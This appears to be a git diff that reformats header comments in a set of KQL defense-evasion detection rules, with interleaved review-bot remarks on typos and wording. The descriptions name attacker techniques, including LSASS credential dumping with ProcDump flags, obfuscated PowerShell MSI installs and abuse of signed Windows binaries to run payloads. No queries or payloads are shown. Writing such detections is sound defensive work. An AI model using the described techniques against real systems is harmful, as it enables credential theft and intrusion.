+// This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1202
diff --git a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
index 73f5e3d7..ca915d68 100644
--- a/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
+++ b/KQL/rules/Defense Evasion/insensitive_subfolder_search_via_findstr_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2020-10-05
 // Level: low
 // Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
index 0c3c6c61..18553f29 100644
--- a/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
+++ b/KQL/rules/Defense Evasion/install_new_package_via_winget_local_manifest.kql
@@ -3,9 +3,8 @@
 // Date: 2020-04-21
 // Level: medium
 // Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
+// The manifest option enables you to install an application by passing in a YAML file directly to the client.
+// Winget can be used to download and install exe, msi or msix files later.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1059
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
index b44c3773..87951736 100644
--- a/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
+++ b/KQL/rules/Defense Evasion/internet_explorer_disablefirstruncustomize_enabled.kql
@@ -3,7 +3,6 @@
 // Date: 2023-05-16
 // Level: medium
 // Description: Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
index fea3d976..b490c7ef 100644
--- a/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
+++ b/KQL/rules/Defense Evasion/jscript_compiler_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2022-05-02
 // Level: low
 // Description: Detects the execution of the "jsc.exe" (JScript Compiler).
-Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
-
+// Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1127
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
index 14e66001..e7ac1c5e 100644
--- a/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
+++ b/KQL/rules/Defense Evasion/lol_binary_copied_from_system_directory.kql
@@ -3,7 +3,6 @@
 // Date: 2023-08-29
 // Level: high
 // Description: Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.003
diff --git a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
index 13072f91..a455041d 100644
--- a/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
+++ b/KQL/rules/Defense Evasion/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
@@ -3,9 +3,8 @@
 // Date: 2020-10-14
 // Level: medium
 // Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
-This option may be used adversaries to execute malicious code by signed verified binary.
-The debugger is installed alongside with Microsoft Visual Studio package.
-
+// This option may be used adversaries to execute malicious code by signed verified binary.
+// The debugger is installed alongside with Microsoft Visual Studio package.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.t1218, attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
index 1c7fddea..a29cf4ec 100644
--- a/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
+++ b/KQL/rules/Defense Evasion/malicious_windows_script_components_file_execution_by_taef_detection.kql
@@ -3,8 +3,7 @@
 // Date: 2020-10-13
 // Level: low
 // Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
-Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
-
+// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
index e8faa924..7e5e0151 100644
--- a/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
+++ b/KQL/rules/Defense Evasion/maxmpxct_registry_value_changed.kql
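Review bot: The new `//` continuation line in the vsjitdebugger hunk carries the source text's grammar error forward, `This option may be used adversaries to execute malicious code by signed verified binary`, which drops the "by" and leaves the point of the rule (execution proxied through a signed, trusted binary) muddled. Since the line is being rewritten anyway, make it `// This option may be used by adversaries to execute malicious code via a signed, verified binary.` The Tags line in the same hunk lists the technique before the tactic (`attack.t1218, attack.defense-evasion`), the reverse of every other rule in this patch; if the converter preserves source order that is fine, but a consistent tactic-first order would make the headers easier to grep.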
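Review bot: In the TAEF hunk the Description line that the new `//` continuation attaches to ends mid-parenthesis, `(C, C#, Microsoft COM Scripting interfaces`, so the header still reads as a truncated sentence after this change. Closing it, `... written on different languages (C, C#, Microsoft COM Scripting interfaces).`, costs nothing and keeps the prefixing fix from cementing the cut-off text. It is likely an artefact of the original source text rather than of the converter, but worth checking the script does not itself drop trailing characters on multi-line descriptions.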
@@ -3,9 +3,8 @@
 // Date: 2024-03-19
 // Level: low
 // Description: Detects changes to the "MaxMpxCt" registry value.
-MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
-Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
-
+// MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
+// Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1070.005
diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
index ee270698..b0e242ea 100644
--- a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
+++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql
@@ -3,7 +3,6 @@
 // Date: 2022-06-13
 // Level: high
 // Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.execution
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
index 59d97807..a312f3c6 100644
--- a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
+++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql
@@ -3,10 +3,9 @@
 // Date: 2019-02-22
 // Level: high
 // Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
-such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
-containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
-execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
-
+// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
+// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
+// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
index 42e61b24..844173d9 100644
--- a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
+++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql
@@ -3,7 +3,6 @@
 // Date: 2022-08-14
 // Level: high
 // Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
index 6e1c87d7..085455fe 100644
--- a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
+++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql
@@ -3,8 +3,7 @@
 // Date: 2022-01-16
 // Level: medium
 // Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.007
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
index 7c3f9335..2801184e 100644
--- a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
+++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql
@@ -3,8 +3,7 @@
 // Date: 2019-10-21
 // Level: medium
 // Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
-Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-
+// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1220
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
index 47eb9926..c966b8b5 100644
--- a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
+++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-09-18
 // Level: high
 // Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
-This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
-
+// This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
index 6e7e7e76..efa434e8 100644
--- a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
+++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2019-10-26
 // Level: medium
 // Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
index 4c4e8b12..491c2009 100644
--- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-03-05
 // Level: medium
 // Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1553.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
index 3ad5cfca..35c79c9c 100644
--- a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2023-03-05
 // Level: medium
 // Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
-Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1553.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
index 2d47b001..9e11b022 100644
--- a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
+++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
@@ -3,11 +3,10 @@
 // Date: 2025-05-27
 // Level: high
 // Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
-The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
-malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
-by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
-hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
-
+// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
 
diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
index dff6354b..25eb58fd 100644
--- a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
+++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql
@@ -3,8 +3,7 @@
 // Date: 2023-02-02
 // Level: high
 // Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
-When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
-
+// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.001
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
index fa41dd99..c5ad1551 100644
--- a/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
+++ b/KQL/rules/Defense Evasion/outbound_network_connection_initiated_by_cmstp_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-30
 // Level: high
 // Description: Detects a network connection initiated by Cmstp.EXE
-Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
-
+// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218.003
 
diff --git a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
index 4ff2d80e..641540a3 100644
--- a/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
+++ b/KQL/rules/Defense Evasion/pdf_file_created_by_regedit_exe.kql
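Review bot: The new comment line in the cmstp hunk, `+// Its uncommon for "cmstp.exe" to initiate an outbound network connection. ...`, keeps a wording slip from the old text: "Its" is possessive, and the sentence needs the contraction, `// It's uncommon for "cmstp.exe" to initiate an outbound network connection. ...`. Since this line is being rewritten anyway, correcting it here avoids carrying the slip into the new header format. The query body of the rule is outside the hunk.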
@@ -3,8 +3,7 @@
 // Date: 2024-07-08
 // Level: high
 // Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
-This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
-
+// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
index 92cd9f87..166c86b8 100644
--- a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
+++ b/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2019-10-26
 // Level: medium
 // Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
-Attackers might abuse this in order to bypass application whitelisting.
-
+// Attackers might abuse this in order to bypass application whitelisting.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
index a4d4f029..ccc28b9a 100644
--- a/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
+++ b/KQL/rules/Defense Evasion/potential_base64_decoded_from_images.kql
@@ -3,7 +3,6 @@
 // Date: 2023-12-20
 // Level: high
 // Description: Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1140
 
diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
index 9bf81b2b..c7cb25b5 100644
--- a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
+++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
@@ -3,8 +3,7 @@
 // Date: 2024-09-02
 // Level: high
 // Description: Detects potential commandline obfuscation using unicode characters.
-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1027
 
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql
index 094b8395..594222d1 100644
--- a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql
@@ -3,8 +3,7 @@
 // Date: 2023-02-15
 // Level: high
 // Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
-This is used as an obfuscation and masquerading techniques.
-
+// This is used as an obfuscation and masquerading techniques.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036.002
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
index 96822dbf..dba28315 100644
--- a/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
+++ b/KQL/rules/Defense Evasion/potential_fake_instance_of_hxtsr_exe_executed.kql
@@ -3,9 +3,8 @@
 // Date: 2020-04-17
 // Level: medium
 // Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
-HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
-Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
-
+// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
+// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036
 
diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
index 54ee0585..4f108098 100644
--- a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
+++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql
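Review bot: The Description context line of the right_to_left_override hunk still refers to the "u202+E" character, which is not a valid code point notation and will confuse an analyst checking the rule against the Unicode chart; the right-to-left override is U+202E, so the header should read `// Description: Detects the presence of the "U+202E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.`. The added line `+// This is used as an obfuscation and masquerading techniques.` also mixes singular and plural and reads better as `// This is used as an obfuscation and masquerading technique.`; the same sentence is added, with the same slip, in the two potential_homoglyph_attack_using_lookalike_characters hunks later in this patch. Since the commit is already rewriting these header comments, it is the natural place to correct them.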
@@ -3,8 +3,7 @@
 // Date: 2023-11-09
 // Level: medium
 // Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-
+// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.execution, attack.t1218
 
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
index 7d0607bb..8b44ac72 100644
--- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-09
 // Level: medium
 // Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
index 34c2ae61..0208baee 100644
--- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
+++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
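Review bot: The added line in the ms_appinstaller hunk, `+// The downloaded files are temporarly stored in ":\Users\%username%\...\AC\INetCache\"`, carries over a typo ("temporarly" should be "temporarily") and a cache path that begins at ":\Users" with no drive letter, which an analyst may read as a truncated path rather than a drive-agnostic one. If the omission is intentional, spelling it out as `<drive>:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\` (placeholder, to be confirmed against the rule's filter) makes that explicit. Both fixes fall inside text the commit is already rewriting.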
@@ -3,7 +3,6 @@
 // Date: 2023-10-09
 // Level: medium
 // Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
-
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1564.004
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
index cab5b704..09b123c5 100644
--- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
+++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql
@@ -3,9 +3,8 @@
 // Date: 2023-05-07
 // Level: medium
 // Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
index da8a62c3..a0864334 100644
--- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
+++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
@@ -3,9 +3,8 @@
 // Date: 2023-05-08
 // Level: medium
 // Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
 // False Positives:
diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
index b393fef2..f8ad213b 100644
--- a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
+++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql
@@ -3,10 +3,9 @@
 // Date: 2018-10-30
 // Level: high
 // Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
-This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
-LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
-Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
-
+// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
+// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
